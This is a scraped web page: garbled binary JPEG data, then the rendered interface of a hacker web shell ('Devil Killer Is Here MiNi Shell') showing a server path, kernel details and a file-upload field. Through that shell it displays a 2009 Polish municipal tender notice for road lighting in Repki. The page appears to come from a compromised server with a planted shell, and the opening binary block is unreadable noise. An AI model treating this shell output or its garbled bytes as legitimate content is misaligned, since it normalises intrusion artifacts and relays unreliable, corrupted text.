JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090108/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090108/9073-N-2009.html

<p class="kh_header"><b>Repki: Poprawa warunków życia i prowadzenia działalności gospodarczej na terenie gminy Repki poprzez dobudowę oświetlenia placów i dróg w miejscach funkcjonowania podmiotów gospodarczych i użyteczności publicznej</b><br>
<b>Numer ogłoszenia: 9073 - 2009; data zamieszczenia: 08.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Repki , ul. Parkowa 7, 08-307 Repki, woj. mazowieckie, tel. 025 7875029, faks 025 7875066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.repkigw.e-bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa warunków życia i prowadzenia działalności gospodarczej na terenie gminy Repki poprzez dobudowę oświetlenia placów i dróg w miejscach funkcjonowania podmiotów gospodarczych i użyteczności publicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
I.	- Wykonanie oświetlenia drogowego w miejscowościach Skwierczyn, Rogów I, Rogów II i Repki w gminie Repki. Projekt zawiera trasy projektowanych linii, miejsca posadowienia słupów oraz opis montażu opraw oświetleniowych na słupach.
Moc przyłączeniowa:
Skwierczyn - P = 2 x 0,07 = 0,14 kW (ze st. tr. Skwierczyn [0198])
Rogów I - P = 5 x 0,07 = 0,35 kW (ze st. tr. Rogów 1 [0093])
Rogów II - P = 3 x 0,07 = 0,21 kW (ze st. tr. Rogów MBM [0899])
Repki - P = 3 x 0,15 = 0,45 kW (ze st. tr. Repki 1 [0087])
Skwierczyn
Z godnie z obliczeniami linię napowietrzną nN oświetlenia drogowego należy wykonać przewodem AsXSn 2x25mm2 o łącznej długości 120 m na projektowanych słupach 21/1/PP-10/ŻN i 21/2/K1-10,5/4,3 nawiązując się do istniejącego słupa 21/RK-12/ŻN.
Rogów I
Z godnie z obliczeniami linię napowietrzną nN oświetlenia drogowego należy wykonać przewodem AsXSn 2x25mm2 o łącznej długości 245 m na projektowanych słupach 6/1/N2-10,5/4,3, 6/2/PP-10/ŻN, 6/3/PP-10/ŻN, 6/4PP-10/ŻN, 6/5/K1-10,5/4,3 nawiązując się do istniejącego słupa 6/BN-10/ŻN.
Rogów II
Z godnie z obliczeniami linię napowietrzną nN oświetlenia drogowego należy wykonać przewodem AsXSn 2x25mm2 o łącznej długości 214 m na projektowanych słupach 6/1/RPK1-10,5/4,3 (wstawić w istniejącą linię napowietrzną nN), 6/2/PP-10/ŻN, 6/3/PP-10/ŻN, 6/4PP-10/ŻN, 6/5/K1-10,5/4,3 na projektowanych słupach nawiązując się do wykonanej wcześniej (na istniejących słupach linii napowietrznej nN) linii oświetlenia drogowego .
Repki
Z godnie z obliczeniami linię napowietrzną nN oświetlenia drogowego należy wykonać przewodem AsXSn 2x25mm2 na projektowanych słupach 64/1/PP-10/ŻN, 64/2/PP-10/ŻN, 64/3/K1-10,5/4,3  nawiązując się do istniejącego słupa 64/RN-10/ŻN.

Szczegóły dotyczące usytuowania linii oraz trasę linii ilustrują rysunki zawarte w projekcie budowlanym.
W miejscach pokazanych na ww. rysunkach należy zainstalować ograniczniki przepięć ASA A440 dla przewodu oświetleniowego i połączyć z istniejącym uziemieniem linii.

Linie napowietrzne nN oświetlenia drogowego wykonać w oparciu o Katalog linii napowietrznych niskiego napięcia z przewodami izolowanymi samonośnymi na żerdziach wirowanych i ŻN autorstwa ENERGOLINIA Poznań.

II.	- Budowa oświetlenia drogowego na istniejących słupach linii napowietrznej nN 230/400 V w miejscowościach Repki, Rogów, Skrzeszew, Ostrowiec i Ostrówek w gminie Repki. Projekt zawiera trasy projektowanych linii oraz opis montażu opraw oświetleniowych na słupach.
Dane energetyczne
Napięcie zasilania - U=230V
Moc przyłączeniowa:
Repki, ul. Ks. Brzóski - P = 3 x 0,15 = 0,45 kW (ze st. tr. Repki POM [0089])
Repki, ul. Sokołowska - P = 2 x 0,15 = 0,30 kW (ze st. tr. Repki 2 [1044])
Repki, dr. do Rogowa - P = 2 x 0,07 = 0,14 kW (ze st. tr. Repki 1 [0087])
Rogów - P = 5 x 0,07 = 0,35 kW (ze st. tr. Rogów MBM [1044])
Skrzeszew kier. młyn - P = 4 x 0,15 = 0,60 kW (ze st. tr. Skrzeszew 3 [1201])
Skrzeszew kier. Liszki - P = 4 x 0,07 = 0,28 kW (ze st. tr. Skrzeszew 11 [1203])
Ostrowiec - P = 2 x 0,07 = 0,14 kW (ze st. tr. Ostrowiec 1 [0397])
Ostrówek - P = 3 x 0,07 = 0,21 kW (ze st. tr. Ostrówek 2 [1264])

Repki, ul. Ks. Brzóski
Zgodnie z obliczeniami linię napowietrzną nN oświetlenia drogowego należy wykonać przewodem AsXSn 2x25mm2 o łącznej długości 100 m na istniejących słupach: 1/2, 1/3 i 1/4 nawiązując się do istniejącego przewodu oświetlenia drogowego na słupie 1/2.
Repki, ul. Sokołowska
Zgodnie z obliczeniami linię napowietrzną nN oświetlenia drogowego należy wykonać przewodem AsXSn 2x25mm2 o łącznej długości 90 m na istniejących słupach 10, 10/1 i 10/2 nawiązując się do istniejącego przewodu oświetlenia drogowego na słupie 10.
Repki, dr. do Rogowa
Zgodnie z obliczeniami linię napowietrzną nN oświetlenia drogowego należy wykonać przewodem AsXSn 2x25mm2 o łącznej długości 90 m na istniejących słupach 43, 43/1, 43/2, 43/3 i 43/4 nawiązując się do istniejącego przewodu oświetlenia drogowego na słupie 43.
Rogów
Zgodnie z obliczeniami linię napowietrzną nN oświetlenia drogowego należy wykonać przewodem AsXSn 2x25mm2 o łącznej długości 429 m na istniejących słupach od 15, 16 ... do 19 oraz od 15, 2, 3, ... do 6/1 wyprowadzając dwa obwody z projektowanej na słupie nr 15 SON.
Skrzeszew kier. młyn
Zgodnie z obliczeniami linię napowietrzną nN oświetlenia drogowego należy wykonać przewodem AsXSn 2x25mm2 o łącznej długości 180 m na istniejących słupach 18, 19, 20 i 21 wyprowadzając nowy obwód z istniejącej SON w st. tr. Skrzeszew 3.
Skrzeszew kier. Liszki
Zgodnie z obliczeniami linię napowietrzną nN oświetlenia drogowego należy wykonać przewodem AsXSn 2x25mm2 o łącznej długości 175 m na istniejących słupach 1, 2, 3, 4 i 5 nawiązując się do istniejącego przewodu oświetlenia drogowego na słupie 5.
Ostrowiec
Zgodnie z obliczeniami linię napowietrzną nN oświetlenia drogowego należy wykonać przewodem AsXSn 2x25mm2 o łącznej długości 116 m na istniejących słupach 9, 9/1 i 9/2 nawiązując się do istniejącego przewodu oświetlenia drogowego na słupie 9.
Ostrówek
Zgodnie z obliczeniami linię napowietrzną nN oświetlenia drogowego należy wykonać przewodem AsXSn 2x25mm2 o łącznej długości 200 m na istniejących słupach 1, 2, 3 i 4 wyprowadzając obwód z projektowanej SON na słupie nr 2.

Linie napowietrzne nN oświetlenia drogowego wykonać w oparciu o Katalog linii napowietrznych niskiego napięcia z przewodami izolowanymi samonośnymi na żerdziach wirowanych i ŻN autorstwa ENERGOLINIA Poznań.
W miejscach pokazanych na rysunkach zawartych w projekcie budowlanym należy zainstalować ograniczniki przepięć ASA A440 dla przewodu oświetleniowego i połączyć z istniejącym uziemieniem linii.

Szczegółowy zakres, ilość, wyszczególnienie zostało określone, w przedmiarach robót, projektach budowlanych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 45.23.22.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium  w wysokości: 2 500,00 zł
Słownie: (dwa tysiące pięćset złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:

1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.

2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:

2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
  2.6 nie zgodzili się na przedłużenie okresu związania ofertą 



3. Zamawiający odrzuca ofertę jeżeli:
3.1 jest niezgodną z ustawą
3.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87   ust. 2 pkt. 3 Prawa zamówień publicznych.
3.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
3.6 zawiera błędy w obliczeniu ceny 
3.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
3.8 jest nieważna na podstawie odrębnych przepisów, 

4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą

5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty  złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia -nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:

  A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1 do SIWZ 
  A.2) Formularz cenowy - wypełniony i podpisany przez wykonawcę - załącznik nr 4 do SIWZ
  A.3) Inne dokumenty określone w SIWZ 

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
 
  B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
  B.2) Dokumenty potwierdzające posiadanie uprawnień, pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
  B.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
  B.4) Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
  B.5) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
  B.6) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych - załącznik nr 2 do SIWZ   
  
C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 

  C.1) Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie - załącznik nr 5 do SIWZ 
  C.2) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje wykonawca - załącznik nr 6 do SIWZ  
  C.3) Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - załącznik nr 7 do SIWZ 
  C.4) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 


D. W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: 

  
  D.1) Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.repkigw.e-bip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy Repki
ul. Parkowa 7
08-307 Repki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2009 godzina 09:45, miejsce: Urząd Gminy Repki
ul. Parkowa 7
08-307 Repki
pokój nr 13.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com